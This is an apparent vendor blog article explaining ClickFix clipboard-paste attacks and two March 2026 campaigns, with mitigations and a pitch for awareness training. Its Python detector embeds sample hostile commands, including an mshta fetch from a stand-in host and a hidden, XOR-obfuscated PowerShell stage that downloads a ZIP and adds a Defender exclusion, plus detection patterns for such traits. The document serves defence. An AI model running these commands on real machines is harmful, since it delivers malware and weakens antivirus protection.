
ClickFix is not a vulnerability in your software. It is a vulnerability in how people respond to problems on their computers. That distinction is what makes it so difficult to stop and so important to understand. First documented in April 2024, the technique has grown at an alarming pace: according to ESET telemetry, ClickFix-based attacks surged by 517% in 2025 alone. Two separate campaigns reported within days of each other in March 2026 show that operators are still finding new ways to evolve the method, and that no industry or user profile is immune.
Key Takeaways
- ClickFix tricks users into running malware themselves by disguising a malicious clipboard command as a routine troubleshooting or verification step.
- Identified in February 2026 and disclosed on March 6, a Microsoft-reported variant abuses Windows Terminal instead of the Run dialog, sidestepping detections tuned to the classic technique.
- A parallel campaign targeted crypto and Web3 professionals on LinkedIn using fake VC personas, fake Zoom links, and a spoofed Cloudflare CAPTCHA to deliver cross-platform payloads.
- Controls built around file downloads and exploits rarely fire on the initial step, because there is nothing to scan: the user executes the command themselves. Detection has to come from what the command does afterwards.
- Security awareness training is the most effective defense: employees who recognize the pattern can stop the attack before a single command runs.
What Is a ClickFix Attack?
The ClickFix tactic is straightforward:
- A targeted user lands on a compromised or fake webpage and encounters what looks like a technical error: a broken document, a failed verification, a CAPTCHA prompt.
- A button or modal instructs them to follow a simple fix. When they click, the page's script silently writes a malicious command to their clipboard (the browser clipboard APIs, such as navigator.clipboard.writeText, make this a one-liner). They are then guided to open a terminal or the Run dialog, paste the content, and press Enter.
- That is it. The user has executed malware themselves, with their own system privileges, in a way that bypasses most automated defenses. No download dialog. No suspicious email attachment. No alert from the operating system.

The name comes from that "fix" button, though not all variants use one. Some frame the interaction as a bot verification. Others impersonate Cloudflare security checks. The lure varies; the mechanism stays the same.
Two Attacks from the Same Week
Microsoft Flags a New Windows Terminal Variant
On March 6, 2026, the Microsoft Threat Intelligence team disclosed a ClickFix campaign that introduced a notable technical shift. The chain ends with Lumma Stealer (also known as LummaC2), a widely used infostealer.
- Rather than directing victims to the classic Windows Run dialog (Win + R), this variant instructed targets to use the Windows + X shortcut (the Quick Link menu) to open Windows Terminal. That drops the user into a full shell, and the same menu offers Terminal (Admin), which would run the pasted command elevated, so the whole interaction looks more like legitimate administrative work.
- This approach bypasses security detections written specifically for Run dialog abuse, while Windows Terminal itself lends the action an air of technical legitimacy.
- Once the user pasted a hex-encoded, XOR-obfuscated command into the terminal, it spawned additional PowerShell instances responsible for decoding the script, downloading a ZIP payload, configuring Microsoft Defender exclusions, and ultimately deploying Lumma Stealer by injecting it into Chrome and Edge browser processes.

One of the ClickFix lures detected by Microsoft Threat Intelligence, spoofing Cloudflare Turnstile on a compromised site - Image courtesy of Microsoft Threat Intelligence
Lumma Stealer then harvested stored credentials, session tokens, and banking information from browser storage files before sending them to attacker-controlled infrastructure. Microsoft also identified a second attack path involving MSBuild.exe and EtherHiding, a technique in which the next stage is stored in a smart contract and retrieved through public blockchain RPC endpoints that are hard to block or take down. It is a sign of how multi-layered these post-infection chains have become.
Crypto and Web3 Professionals Targeted via Fake LinkedIn VCs
On March 5, Moonlock Lab published a separate investigation into a campaign that used a much more elaborate social engineering setup. Attackers posed as executives from fake venture capital funds with names like SolidBit Capital, MegaBit, and Lumax Capital, using polished LinkedIn profiles and tailored outreach messages that referenced targets' recent work.
- The goal was to build enough trust to get a meeting scheduled. Instead of standard corporate tooling, victims were steered toward Calendly pages that redirected to spoofed Zoom or Google Meet links hosted on attacker-controlled domains.
- Once a target clicked the meeting link, they landed on a cloned conference page overlaid with what appeared to be a Cloudflare CAPTCHA. The page rendered a familiar "I'm not a robot" checkbox, but no genuine Cloudflare challenge tokens or scripts were present: everything was local HTML and CSS controlled by the attacker.
- Clicking the checkbox silently poisoned the clipboard with an OS-specific command, then a second modal walked the user through executing it in a terminal.

Another spoofed Cloudflare page used as a ClickFix lure - Image courtesy of Moonlock Lab
Moonlock Lab linked this activity to macOS binaries that initially scored zero detections on VirusTotal. On Windows, the chain used hidden PowerShell to pull and execute a remote script directly in memory, leaving no obvious file on disk. Researchers noted operational overlaps with UNC1069, a financially motivated group with reported ties to North Korea that has previously used ClickFix in Zoom-themed attacks against cryptocurrency organizations.
Why ClickFix Is So Hard to Stop with Technical Controls Alone
Most security tooling is built around a relatively simple model: detect a malicious file, block a malicious URL, or catch a known exploit pattern. ClickFix sidesteps all of this because the delivery mechanism is the user's own hands.
There is no email attachment to scan. No drive-by download to flag. The malicious command arrives via the clipboard and is pasted into a terminal by a real human being. To a logging system that only records who ran what, it looks like an interactive user running a command.
Because the victim executes the command manually, many traditional defenses such as download filters and exploit detection never trigger, making ClickFix an effective living-off-the-user technique.
Technical mitigations help at the margins:
- Restricting the Windows Run dialog via Group Policy (User Configuration > Administrative Templates > Start Menu and Taskbar > "Remove Run menu from Start Menu", which also disables Win + R). The Windows Terminal variant above is a reminder that this only closes one door: Terminal ships with Windows 11 and is one keyboard shortcut away.
- Blocking execution of mshta.exe and PowerShell from user-writable directories, and constraining PowerShell with Constrained Language Mode or application control where the environment allows it.
- Deploying endpoint detection and response solutions capable of catching post-execution behavior: an interpreter launched under explorer.exe or a terminal host with a hidden window, an encoded or hex-obfuscated argument, a remote fetch, or a Defender exclusion being added. The RunMRU registry key (HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU) also records what was typed into the Run dialog and is worth collecting during an investigation.
But none of these prevent a motivated user from following a convincing set of instructions in a terminal window that looks just like their normal work environment.
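As an added example (not detection code from Microsoft, Moonlock Lab or Arsen), the following Python script shows what that post-execution detection can look like over process-creation telemetry. It scores each event on the parent/child pair and command-line traits listed above, and it also recovers a hex-encoded, XOR-obfuscated stage of the kind the Windows Terminal variant pastes, then scores the recovered text as well. The events, paths, domain, XOR key and hex blob are all constructed for illustration; the OpenConsole.exe parent reflects how a Windows Terminal session hosts its shell, and the two-reason threshold is an assumption chosen so that a plain interactive shell under Terminal stays below the bar.

```python
"""Triage ClickFix-style process-creation events (added example for this article,
not detection code from Microsoft, Moonlock Lab or Arsen). Events are constructed,
Sysmon-like records; the paths, domain, XOR key and hex blob are assumptions."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Processes that host a pasted command: explorer.exe owns the Run dialog, while a
# Windows Terminal session runs its shell under OpenConsole.exe.
PASTE_HOSTS = {"explorer.exe", "windowsterminal.exe", "openconsole.exe"}
# Interpreters and LOLBins the chains on this page stage through.
STAGE_BINARIES = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "msbuild.exe"}

HEX_BLOB = re.compile(r"(?:[0-9a-fA-F]{2}){40,}")
ARG_PATTERNS = [
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I), "hidden window"),
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I), "encoded command"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I), "Invoke-Expression"),
    (re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|curl)\b", re.I), "remote fetch"),
    (re.compile(r"https?://", re.I), "embedded URL"),
    (re.compile(r"add-mppreference.*-exclusion", re.I), "Defender exclusion"),
    (HEX_BLOB, "long hex blob"),
]
# Case-sensitive on purpose: XOR with 0x20 flips ASCII case, so a case-insensitive
# marker check would accept a wrong key.
PLAINTEXT_MARKERS = (b"powershell", b"http://", b"https://", b"Invoke-")


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def xor_decode_hex(blob: str) -> Optional[Tuple[int, bytes]]:
    """Brute-force a single-byte XOR key over a hex blob; return (key, plaintext) for
    the first key whose output is printable ASCII and contains a known marker."""
    raw = bytes.fromhex(blob)
    for key in range(256):
        candidate = bytes(b ^ key for b in raw)
        if all(0x20 <= b < 0x7F for b in candidate) and any(m in candidate for m in PLAINTEXT_MARKERS):
            return key, candidate
    return None


def score_event(ev: ProcEvent) -> dict:
    """Collect reasons an event looks like a ClickFix execution; two or more is a hit."""
    parent, image = _basename(ev.parent_image), _basename(ev.image)
    reasons: List[str] = []
    if image in STAGE_BINARIES and (parent in PASTE_HOSTS or parent in STAGE_BINARIES):
        reasons.append(f"{image} launched under {parent}")
    for pattern, label in ARG_PATTERNS:
        if pattern.search(ev.command_line):
            reasons.append(label)
    decoded = None
    blob = HEX_BLOB.search(ev.command_line)
    if blob:
        hit = xor_decode_hex(blob.group(0))
        if hit:
            key, decoded = hit
            reasons.append(f"hex blob decodes with XOR key 0x{key:02x}")
            for pattern, label in ARG_PATTERNS:  # score the recovered stage as well
                if pattern is not HEX_BLOB and pattern.search(decoded.decode("ascii")):
                    reasons.append(f"decoded: {label}")
    return {"suspicious": len(reasons) >= 2, "reasons": reasons, "decoded": decoded}


def triage(events: List[ProcEvent]) -> List[dict]:
    return [score_event(ev) for ev in events]


# Constructed samples: an interactive shell, a classic Run-dialog mshta lure, and a
# Terminal-variant paste that carries a hex/XOR-obfuscated second stage.
SAMPLE_KEY = 0x2A  # assumed key for the constructed sample
SAMPLE_PLAIN = (b"iwr http://example.invalid/a.zip -OutFile $env:TEMP\\a.zip; "
                b"Add-MpPreference -ExclusionPath $env:TEMP")
SAMPLE_HEX = bytes(b ^ SAMPLE_KEY for b in SAMPLE_PLAIN).hex()
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\WindowsApps\Microsoft.WindowsTerminal\OpenConsole.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -NoLogo"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://example.invalid/verify.hta"),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -c \"$h='" + SAMPLE_HEX + "';$k=0x2a;"
              "iex(-join(($h -split '(..)' | ? {$_}) | % {[char]([Convert]::ToInt32($_,16) -bxor $k)}))\""),
]

if __name__ == "__main__":
    for ev, result in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(f"{_basename(ev.parent_image)} -> {_basename(ev.image)}: suspicious={result['suspicious']}")
        for reason in result["reasons"]:
            print("   ", reason)
```

Run as a script it prints the three verdicts with their reasons. The first event (an ordinary shell opened in Windows Terminal) collects a single reason and is not flagged; the mshta lure and the hex/XOR paste each collect two or more. Real telemetry adds noise that this toy scorer ignores, so in production the parent/child rule and the threshold would be tuned per environment rather than taken as written.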
The Real Defense Is Awareness Training
Both campaigns, despite very different targeting and delivery, failed at the same point in the attack chain: the moment a user realizes something is off.
In the LinkedIn VC campaign, one target became suspicious when the “investor” refused a legitimate Google Meet and insisted on using their own link. That hesitation was enough to avoid compromise. This is exactly what security awareness training is meant to produce. Not memorized rules, but the kind of practiced instinct that makes an unusual request feel wrong before it becomes a crisis.
For example, employees who understand how ClickFix works know that no legitimate troubleshooting process, CAPTCHA, or investor onboarding flow will ever ask them to open a terminal and paste commands. That knowledge turns a sophisticated, multi-stage attack into something recognizable, and therefore avoidable.
Improve your employees' reflexes with Arsen
ClickFix is not going away. The two March 2026 campaigns show operators actively refining the technique, expanding the lures, and targeting new platforms and audiences. The method is cheap to deploy, hard to detect automatically, and brutally effective against users who have never seen it before.
For organizations, the implication is clear: training must include current social engineering techniques by name, with realistic scenarios that reflect how attacks actually appear today. Generic phishing awareness is no longer enough when attackers are building fake LinkedIn profiles, Cloudflare verifications, and Windows 11 interfaces to make their instructions look routine.
Modern security awareness training solutions like Arsen help you assess and train your employees against such attacks by running learn-by-doing simulations that build transferable reflexes for the moment users face phishing.
Arsen offers a wide range of ClickFix phishing scenarios to test your team.
